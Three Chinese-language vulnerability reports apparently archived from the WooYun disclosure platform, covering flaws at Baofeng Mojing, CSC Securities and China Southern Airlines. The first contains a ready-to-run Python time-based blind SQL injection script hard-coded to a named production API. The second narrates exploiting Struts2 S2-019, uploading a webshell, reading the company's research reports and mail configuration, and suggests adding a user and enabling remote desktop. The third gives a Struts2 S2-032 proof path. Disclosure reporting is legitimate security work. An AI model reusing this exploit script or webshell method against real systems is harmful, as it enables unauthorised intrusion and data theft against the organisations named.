漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-04： 厂商已经确认，细节仅向厂商公开2016-05-14： 细节向核心白帽子及相关领域专家公开2016-05-24： 细节向普通白帽子公开2016-06-03： 细节向实习白帽子公开2016-06-18： 细节向公众公开简要描述：暴风魔镜某接口SQL注入(附验证脚本)详细说明： code 区域http://mj.cms.mojing.cn/api/v1/vr_market/source_list.php?source_type=2&category_id={catid}&version=20151016其中category_id存在注入 漏洞证明：[Done] MySQL user is [email protected]/* */%code 区域#encoding=utf-8 import httplib import time import string import sys import random import urllib headers = {} payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime()) user = '' for i in range(1, 24): for payload in payloads: try: s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) s = "aaa'XOR(if(%s,sleep(5),0))OR'bbb" % s conn = httplib.HTTPConnection('mj.cms.mojing.cn', timeout=3) conn.request(method='GET',url="/api/v1/vr_market/source_list.php?source_type=2&category_id=%s" % urllib.quote(s)) conn.getresponse() conn.close() print '.', except: user += payload print '\n[in progress]', user, time.sleep(5.0) break print '\n[Done] MySQL user is %s' % user修复方案：参数过滤版权声明：转载请注明来源 fuckadmin@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-05-04 19:26厂商回复：感谢您提交的漏洞，我们会尽快修复。最新状态：暂无

漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-09： 厂商已经确认，细节仅向厂商公开2016-05-19： 细节向核心白帽子及相关领域专家公开2016-05-29： 细节向普通白帽子公开2016-06-08： 细节向实习白帽子公开2016-06-23： 细节向公众公开简要描述：http://yfpt.csc.com.cn:8080/km/login.dhtml中信建投证券股份有限公司（下称“中信建投证券”或“公司”）成立于2005年11月2日，是经中国证监会批准设立的全国性大型综合证券公司。公司总部位于北京，截至2014年底，公司在境内拥有205家证券营业部和19家期货营业部，分布在北京、上海、天津、重庆等直辖市，以及华北、东北、华东、中南、西南、西北等地区30个省份近百个大中城市。前面有人提及S-016漏洞http://www.wooyun.org/bugs/wooyun-2010-0185740，贵公司竟评“远程任意命令执行”漏洞为低，是因为没有深入拿下服务器？下面以S-019漏洞证明如何拿下服务的详细说明：中信建投证券：http://yfpt.csc.com.cn:8080/km/login.dhtml（1）先Nmap看下开放端口和操作系统类型（2）验证S-019漏洞的存在（3）查看应用当前目录（4）执行命令whoami（5）执行命令ipconfig就目前为止，你可能认为问题不大，但你试想如果我把Tomcat和IIS进程关掉，甚至执行关机或重启命令，后果如何？漏洞证明：上传个WebShell（俗称web木马），拿下服务器（6）访问试试http://yfpt.csc.com.cn:8080/km/bk.jsp，成功（7）查看贵公司的所有研究报告。。。。（8）查看系统的邮箱配置到这里，已经可以下载任何文件、执行任何命令，哈哈总结：当然也可以开启远程桌面服务3389端口，再新加用户，登录到桌面系统。只是为了验证漏洞的存在和严重性，通过Webshell已经可以实现服务器所有操作。修复方案：升级struts2版权声明：转载请注明来源 Budi@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-05-09 09:31厂商回复：漏洞已认领，已通知厂商进行整改。最新状态：暂无

漏洞详情披露状态： 2016-04-26： 细节已通知厂商并且等待厂商处理中2016-04-26： 厂商已经确认，细节仅向厂商公开2016-05-06： 细节向核心白帽子及相关领域专家公开2016-05-16： 细节向普通白帽子公开2016-05-26： 细节向实习白帽子公开2016-06-10： 细节向公众公开简要描述：中国南方航空某站s2-032命令执行详细说明：http://b2g.csair.com/login.action不深入，只为提醒厂商，wooyun是个好地方漏洞证明： /opt/jboss-eap-4.3/jboss-as/server/default/./tmp/deploy/tmp693208980283194622b2gweb-exp.war/test.jsp修复方案：update版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：12确认时间：2016-04-26 17:14厂商回复：谢谢报告。加强安全。。。最新状态：暂无